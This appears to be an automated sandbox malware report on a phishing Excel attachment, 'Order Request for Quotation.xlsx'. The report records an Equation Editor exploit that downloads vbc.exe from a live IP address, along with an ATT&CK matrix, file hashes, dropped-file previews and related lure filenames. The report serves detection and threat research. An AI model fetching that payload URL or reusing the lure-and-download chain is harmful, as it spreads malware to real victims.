    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D8167 mov eax, dword ptr fs:[00000030h]6_2_003D8167
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D732C mov eax, dword ptr fs:[00000030h]6_2_003D732C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D2531 mov eax, dword ptr fs:[00000030h]6_2_003D2531
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4E17 mov eax, dword ptr fs:[00000030h]6_2_003D4E17
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D7730 mov eax, dword ptr fs:[00000030h]6_2_003D7730
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
    Source: vbc.exe, 00000006.00000002.2362172265.0000000000850000.00000002.00000001.sdmpBinary or memory string: Program Manager
    Source: vbc.exe, 00000006.00000002.2362172265.0000000000850000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: vbc.exe, 00000006.00000002.2362172265.0000000000850000.00000002.00000001.sdmpBinary or memory string: !Progman
    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsExploitation for Client Execution12Path InterceptionProcess Injection12Masquerading111OS Credential DumpingSecurity Software Discovery31Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsExtra Window Memory Injection1Virtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information21NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol121SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Information Discovery33VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\Public\vbc.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://198.12.91.134/hkcmd/vbc.exe0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://198.12.91.134/hkcmd/vbc.exetrue
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.day.com/dam/1.03938F7BB.emf.0.drfalse
      		high

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      198.12.91.134
      		unknownUnited States
      		36352AS-COLOCROSSINGUStrue

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:451298
      Start date:20.07.2021
      Start time:14:01:21
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 6m 17s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:Order Request for Quotation.xlsx
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:5
      Number of new started drivers analysed:2
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.expl.evad.winXLSX@4/13@0/1
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:Failed
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xlsx
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll
      • Report size getting too big, too many NtCreateFile calls found.
      • Report size getting too big, too many NtQueryAttributesFile calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      14:02:06API Interceptor44x Sleep call for process: EQNEDT32.EXE modified

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      198.12.91.134Order Request.xlsxGet hashmaliciousBrowse
      • 198.12.91.134/cvc/vbc.exe
      Request For Quotation.xlsxGet hashmaliciousBrowse
      • 198.12.91.134/html/vbc.exe

      Domains

      No context

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      AS-COLOCROSSINGUSQuotaton.xlsxGet hashmaliciousBrowse
      • 198.12.81.125
      SWIFT MESSAGE DETAILS.xlsxGet hashmaliciousBrowse
      • 192.210.173.40
      PI.xlsxGet hashmaliciousBrowse
      • 198.23.207.48
      ftpp.xlsxGet hashmaliciousBrowse
      • 198.46.132.159
      swift.xlsxGet hashmaliciousBrowse
      • 198.23.207.48
      Ever Brilliant scan.xlsxGet hashmaliciousBrowse
      • 192.210.173.40
      Payment Instruction.xlsxGet hashmaliciousBrowse
      • 192.227.129.35
      New Order.xlsxGet hashmaliciousBrowse
      • 172.245.119.59
      Invoice-Scancopy.docxGet hashmaliciousBrowse
      • 23.94.159.183
      Remittance_Form.xlsxGet hashmaliciousBrowse
      • 172.245.119.102
      Ee50nK4E89.exeGet hashmaliciousBrowse
      • 192.227.128.168
      ly1.xlsxGet hashmaliciousBrowse
      • 198.23.212.139
      INV420.xlsxGet hashmaliciousBrowse
      • 198.46.132.159
      INV420.xlsxGet hashmaliciousBrowse
      • 198.46.132.159
      document34.xlsxGet hashmaliciousBrowse
      • 23.95.13.151
      Payment Advice.xlsxGet hashmaliciousBrowse
      • 192.210.173.40
      Payment_Ref_Advice.xlsxGet hashmaliciousBrowse
      • 192.210.173.40
      FACTURAS PENDIENTES 3782#.xlsxGet hashmaliciousBrowse
      • 198.12.91.148
      Order Request.xlsxGet hashmaliciousBrowse
      • 198.12.91.134
      11_extracted.exeGet hashmaliciousBrowse
      • 23.94.82.41

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
      Category:downloaded
      Size (bytes):118784
      Entropy (8bit):6.4666127843418355
      Encrypted:false
      SSDEEP:1536:/bjX1R6rHR+Gz6YsFdVfKcLe0NMDfuoFVHYGokXYtvcOOfgrJZ+R6rHJXdb:jjX1yH1HErzwmoFtoZtkJgrCyHJXd
      MD5:C8FEB9D53B567CD1BFB0E59CF7D26BC2
      SHA1:82A22CB59D46BAE21FA4877015E163EACC04A022
      SHA-256:642A0DF15A9B8E3124D638E755F0BDBACD0D1C3FF01B59B36213A190A5E5645A
      SHA-512:DA707134A7BFDCB66389F111BB363D1E7B7260BB718D6AE999A23FC538E2065D8BE766A713D8D20860E835EB21609BBBCB0D0B6C237124FA38BD2ADA04ACF157
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Reputation:low
      IE Cache URL:http://198.12.91.134/hkcmd/vbc.exe
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L....!.Q.................@..........(........P....@.................................8.......................................DK..(....p..jm..................................................................(... .......t............................text....=.......@.................. ..`.data...\....P.......P..............@....rsrc...jm...p...p...`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\187A408E.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
      Category:dropped
      Size (bytes):62140
      Entropy (8bit):7.529847875703774
      Encrypted:false
      SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
      MD5:722C1BE1697CFCEAE7BDEFB463265578
      SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
      SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
      SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3938F7BB.emf
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):648132
      Entropy (8bit):2.8121948848596445
      Encrypted:false
      SSDEEP:3072:m34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:I4UcLe0JOcXuunhqcS
      MD5:D8A0B6735E4738686530BF348653BE15
      SHA1:40A0EF7371524007D2AC66425DFACA355BDCA68E
      SHA-256:8538D1761B10B5C9CDFA320617718C5194E0C555B3BE4970D19AC28C337209E3
      SHA-512:7E2856F9C6F83AD535E8CA0834F9B1BE89EBAB759CEA47A1EDE99283A02EB4EBA0A527F541E8578785320E156E4298AB86FADF3881B78E9F47DB2985840DD16D
      Malicious:false
      Reputation:low
      Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................%Q$...../.-z.Q.@U.%...../.../.....P./.../..N.RP./.H./......./.4./..N.RP./.H./. ....y.QH./.P./. ............z.Q............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i............./.X...H./.|./...........ovdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3DA42481.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
      Category:dropped
      Size (bytes):85020
      Entropy (8bit):7.2472785111025875
      Encrypted:false
      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
      MD5:738BDB90A9D8929A5FB2D06775F3336F
      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\41CBDB37.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):11303
      Entropy (8bit):7.909402464702408
      Encrypted:false
      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
      Malicious:false
      Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\75377FBA.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
      Category:dropped
      Size (bytes):62140
      Entropy (8bit):7.529847875703774
      Encrypted:false
      SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
      MD5:722C1BE1697CFCEAE7BDEFB463265578
      SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
      SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
      SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
      Malicious:false
      Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89DF9873.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):11303
      Entropy (8bit):7.909402464702408
      Encrypted:false
      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
      Malicious:false
      Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\977CE15D.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
      Category:dropped
      Size (bytes):85020
      Entropy (8bit):7.2472785111025875
      Encrypted:false
      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
      MD5:738BDB90A9D8929A5FB2D06775F3336F
      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
      Malicious:false
      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBDC1680.emf
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):7608
      Entropy (8bit):5.079884407069233
      Encrypted:false
      SSDEEP:96:+SNL6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:53jU+H3tWa6WdTfOYLpR8d
      MD5:184C7C6B8F6DA439988B8A3FD16AA03F
      SHA1:3D4DD38C5454DB5C75754A9985F5EFCC28221EEC
      SHA-256:EFF196C9D34ED5A4E7B26E567AB8B1F080C67404FFD6CC7377D5B772AF0D4831
      SHA-512:00A5E6682DF2661863256053586A47F29CB0399A241DBD7365FB214BC64679FD73AF6637EA4947B1920D984B2104896B34722B20B97DEE23012255794785A3E2
      Malicious:false
      Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................@.6.).X.......d...................d... ......q....\...d.......d.........q....d....6.u...q....`..q`m@.$y.w..J...8............w..J.$.......d............^ q.....^ q..I...J...?...8.-........<.w................<..v.Znv....X.np....`m@.......................ovdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9110BCC.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):94963
      Entropy (8bit):7.9700481154985985
      Encrypted:false
      SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
      MD5:17EC925977BED2836071429D7B476809
      SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
      SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
      SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
      Malicious:false
      Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA538FD8.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):94963
      Entropy (8bit):7.9700481154985985
      Encrypted:false
      SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
      MD5:17EC925977BED2836071429D7B476809
      SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
      SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
      SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
      Malicious:false
      Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
      C:\Users\user\Desktop\~$Order Request for Quotation.xlsx
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):330
      Entropy (8bit):1.4377382811115937
      Encrypted:false
      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
      MD5:96114D75E30EBD26B572C1FC83D1D02E
      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
      Malicious:false
      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      C:\Users\Public\vbc.exe
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):118784
      Entropy (8bit):6.4666127843418355
      Encrypted:false
      SSDEEP:1536:/bjX1R6rHR+Gz6YsFdVfKcLe0NMDfuoFVHYGokXYtvcOOfgrJZ+R6rHJXdb:jjX1yH1HErzwmoFtoZtkJgrCyHJXd
      MD5:C8FEB9D53B567CD1BFB0E59CF7D26BC2
      SHA1:82A22CB59D46BAE21FA4877015E163EACC04A022
      SHA-256:642A0DF15A9B8E3124D638E755F0BDBACD0D1C3FF01B59B36213A190A5E5645A
      SHA-512:DA707134A7BFDCB66389F111BB363D1E7B7260BB718D6AE999A23FC538E2065D8BE766A713D8D20860E835EB21609BBBCB0D0B6C237124FA38BD2ADA04ACF157
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L....!.Q.................@..........(........P....@.................................8.......................................DK..(....p..jm..................................................................(... .......t............................text....=.......@.................. ..`.data...\....P.......P..............@....rsrc...jm...p...p...`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

      Static File Info

      General

      File type:CDFV2 Encrypted
      Entropy (8bit):7.994022984212773
      TrID:
      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
      File name:Order Request for Quotation.xlsx
      File size:1174528
      MD5:180907e797d9f4abe57d016b3a4a0da4
      SHA1:516bd547d90c8f4ae96c1d828908f3264012937b
      SHA256:be589141d3e75f2d8b269dcca0afac7d30d6e2d10d376bb9fdd6236d164b7594
